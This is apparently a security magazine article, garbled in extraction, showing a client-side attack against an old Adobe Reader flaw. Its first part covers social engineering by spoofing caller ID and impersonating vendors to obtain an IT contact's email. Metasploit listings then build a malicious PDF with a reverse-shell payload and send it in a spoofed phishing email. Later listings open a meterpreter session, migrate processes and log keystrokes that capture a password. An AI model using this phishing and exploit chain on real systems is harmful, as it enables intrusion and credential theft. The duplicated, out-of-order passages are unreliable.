Imagine you receive a PDF attachment from a friend or a colleague, you open it and you get an Adobe Reader not able to open PDF attachments because the file maybe damaged or not created properly. Your first thought is that the source may not be good, you run it through antivirus and it shows the file is clean; this gives you the feeling of safety.You now click ok to continue with your tasks to ask your IT for help for to try something else.You didn't realize that you just got owned!
    Imagine you receive a PDF attachment from a friend or a colleague, you open it and you get an Figure 2 PDF attachments because the file maybe damaged or not created properly. Your first thought is that the source may not be good, you run it through antivirus and it shows the file is clean; this gives you the feeling of safety.

    You now click ok to continue with your tasks to ask your IT for help for to try something else.

    You didnt realize that you just got owned!In a traditional scenario, an attacker would do

    dumpster diving and get emails and other printouts to get some information about you.

    I feel there are better ways to get such information and thats where the art of social engineering comes in. Many a times I have used social engineering techniques to prove that anything can be done if you know how to talk your way through it. In our scenario our attacker has been doing a lot of information gathering using tools such as the (MetaSploit Framework), (Maltego) and other tools to gather email addresses and information to launch a social engineering client side attack on the victim.

    VulnerabilityDescriptionA remote overflow exists in Adobe Reader and Adobe Acrobat. The document reader fails to properly bounds check input to the util.printf() javascript function resulting in a stack-based overflow. With a specially

    crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

    ClassicationLocation: Remote / Network AccessAttack Type: Input ManipulationImpact: Loss of IntegritySolution: UpgradeExploit: Exploit Public, Exploit CommercialDisclosure: OSVDB Verified, Vendor Verified

    ScenarioFor our demonstration we will talk about how the said Social Engineering will be done to extract the required information. First we choose a victim, then we do go to their website and search the careers section for the available IT Jobs of the company to find out what jobs are vacant, their individual descriptions will give us the information about various software technologies in use.

    Getting a brief idea, we can then search major vendors websites for their testimonials or clients. Every vendor displays its client list on its website proudly to show credibility and to have major organizations vouch for their quality and work.

    A call to these vendors posing as a large organization, spoofing your caller id to reflect the same and talking to them, we can ask them to tell us about the victim company, saying we have worked with them before,


    With every passing day, with each new software, hackers around the world start looking for vulnerabilities and write exploit codes for them. Patching those vulnerabilities takes a lot of time and by then the systems have been compromised. As an attacker, there are many ways to compromise the client side systems, my preferred method involves social engineering.

    I hacked your computer


    mail id is in the victims hierarchy the better it is for the attacker.

    After a successful Social Engineering session and scraping for emails from the web, you have gained two key pieces of information.

    They use XYZ Computers for technical services. The IT Dept has an email address of

    [email protected]

    we like the products you gave to them, and would like to have the same products for us. Or it can be saying that we have seen your client list and are not sure if we can trust them saying you are new to this region etc. Have the vendor give you the email address of the IT contact they have in the company so you can ask them personally about the vendors claim of excellent services. Most vendors will oblige to this thinking it will be good for this business. The higher the owner of the

    Listing 1. Creating malicious PDF le

    msf > use exploit/windows/fileformat/adobe_utilprintf

    msf exploit(adobe_utilprintf) > set FILENAME XYZComputers-UpgradeInstructions.pdf

    FILENAME => XYZComputers-UpgradeInstructions.pdf

    msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp

    PAYLOAD => windows/meterpreter/reverse_tcp

    msf exploit(adobe_utilprintf) > set LHOST

    LHOST =>

    msf exploit(adobe_utilprintf) > set LPORT 4455

    LPORT => 4455

    msf exploit(adobe_utilprintf) > show options

    Module options:

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    FILENAME XYZComputers-UpgradeInstructions.pdf yes The file name.

    OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The location of the file.

    Payload options (windows/meterpreter/reverse_tcp):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    EXITFUNC process yes Exit technique: seh, thread, process

    LHOST yes The local address

    LPORT 4455 yes The local port

    Exploit target:

    Id Name

    -- ----

    0 Adobe Reader v8.1.2 (Windows XP SP3 English)

    Listing 2. PDF le created

    msf exploit(adobe_utilprintf) > exploit

    [*] Handler binding to LHOST

    [*] Started reverse handler

    [*] Creating 'XYZComputers-UpgradeInstructions.pdf' file...

    [*] Generated output file /pentest/exploits/framework3/data/exploits/XYZComputers-UpgradeInstructions.pdf

    [*] Exploit completed, but no session was created.

    msf exploit(adobe_utilprintf) >


    Now what?We want to gain shell on the IT Departments computer and run a key logger to gain passwords, intel about possible confidential things in use or any other juicy tidbits of info we can get our hands on.

    We start off by loading our (MetaSploit Framework) msfconsole.

    After we are loaded we want to create a malicious PDF that will give the victim a sense of security in opening it. To do that, it must appear legit, have a title that is realistic, and not be flagged by anti-virus or other security alert software. We are going to be using the Adobe Reader util.printf() JavaScript Function Stack Buffer Overflow Vulnerability.

    Listing 3. Setting up multi handler listener

    msf > use exploit/multi/handler

    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

    msf exploit(handler) > set LPORT 4455

    LPORT => 4455

    msf exploit(handler) > set LHOST

    LHOST =>

    msf exploit(handler) > exploit

    [*] Handler binding to LHOST

    [*] Started reverse handler

    [*] Starting the payload handler...

    Listing 4. Creating hacking e-mail

    root@bt:~# sendEmail -t [email protected] -f [email protected] -s -u Important Upgrade

    Instructions -a /tmp/XYZComputers-UpgradeInstructions.pdf

    Reading message body from STDIN because the '-m' option was not used.

    If you are manually typing in a message:

    First line must be received within 60 seconds.

    End manual input with a CTRL-D on its own line.

    IT Dept,

    We are sending this important file to all our customers. It contains very important instructions for upgrading

    and securing your software. Please read and let us know if you have any problems.


    XYZ Computers Tech Support

    Aug 24 17:32:51 bt sendEmail[13144]: Message input complete.

    Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully!

    Listing 5. What displays on the attackers machine screen...

    [*] Handler binding to LHOST

    [*] Started reverse handler

    [*] Starting the payload handler...

    [*] Sending stage (718336 bytes)

    session[*] Meterpreter session 1 opened ( ->

    meterpreter >


    Adobe Reader is prone to stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

    An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.

    So we start by creating our malicious PDF file for use in this client side attack (Listing 1).

    Once we have all the options set the way we want, we run exploit to create our malicious file (Listing 2).

    So we can see that our pdf file was created in a sub-directory of where we are. So lets copy it to our /tmp directory so it is easier to locate later on in our exploit.

    Listing 6. Further exploiting

    meterpreter > ps

    Process list


    PID Name Path

    --- ---- ----

    852 taskeng.exe C:\Windows\system32\taskeng.exe

    1308 Dwm.exe C:\Windows\system32\Dwm.exe

    2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe

    2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe

    3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe

    3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe

    meterpreter > run post/windows/manage/migrate

    [*] Running module against V-MAC-XP

    [*] Current server process: svchost.exe (1076)

    [*] Migrating to explorer.exe...

    [*] Migrating into process ID 816

    [*] New server process: Explorer.EXE (816)

    meterpreter > sysinfo

    Computer: OFFSEC-PC

    OS : Windows Vista (Build 6000, ).

    meterpreter > use priv

    Loading extension priv...success.

    meterpreter > run post/windows/capture/keylog_recorder

    [*] Executing module against V-MAC-XP

    [*] Starting the keystroke sniffer...

    [*] Keystrokes being saved in to /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt

    [*] Recording keystrokes...

    root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt

    Keystroke log started at Wed Mar 23 09:18:36 -0600 2011

    Support, I tried to open this file 2-3 times with no success. I even had my admin and CFO try it, but no

    one can get it to open. I turned on the remote access server so you can log in to fix our problem. Our user name

    is admin and password for that session is 123456. Call me when you are done. Thanks IT Dept


    Before we send the malicious file to our victim we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener (Listing 3).

    Now that our listener is waiting to receive its malicious payload we have to deliver this payload to the victim and since in our information gathering we obtained the email address of the IT Department we will use a handy little script called sendEmail to deliver this payload to the victim. With a kung-fu one-liner, we can attach the malicious pdf, use any smtp server we want and write a pretty convincing email from any address we want... (Listing 4).

    As we can see here, the script allows us to put any FROM (-f) address, any TO (-t) address, any SMTP (-s) server as well as Titles (-u) and our malicious attachment (-a). Once we do all that and press enter we can type any message we want, then press CTRL+D and this will send the email out to the victim.

    Now on the victims machine, our IT Department employee is getting in for the day and logging into his computer to check his email.

    He sees the very important document and copies it to his desktop as he always does, so he can scan this with his favorite anti-virus program.

    As we can see, it passed with flying colors so our IT admin is willing to open this file to quickly implement these very important upgrades. Clicking the file opens

    Adobe but shows a greyed out window that never reveals a PDF. The greyed out window looks like this: (Figur 2 Adobe Reader Vulnerability). And then, on the attackers machine what is revealed... (Listing 5).

    We now have a shell on their computer through a malicious PDF client side attack. Of course what would be wise at this point is to move the shell to a different process, so when they kill Adobe we dont lose our shell. Then obtain system info, start a key logger and continue exploiting the network (Listing 6).

    ConclusionAnd thats it, its game over for the victim. The attacker can now not only get hold of sensitive information but also copy any data from the victims computer. This vulnerability affects Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument.

    SolutionUpgrade to version 8.1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Or in a really bad case, reinstall your OS.

    Figure 1. PDF Virus Check

    Figure 2. Adobe Reader not able to open

    MILIND BHARGAVAMilind Bhargava, (CEH), (ECSA) is in love with the eld of Information Security, in pursuit of his love he has completed his CEH & ECSA certications in 2010 from EC-Council and completed IT Security & Ethical Hacking course from Appin Noida, India. He has worked as Head of IT for an Oil & Gas MNC in Doha, Qatar, where his responsibilities included but were not limited to Network Security. He believes that ethical hacking is an addiction, which you can never master. Its a skill which you can control, but never stop learning more about. And so he continues on his quest as an eternal student.

    CoverEDITORS NOTECONTENTSHi! I hacked your computer
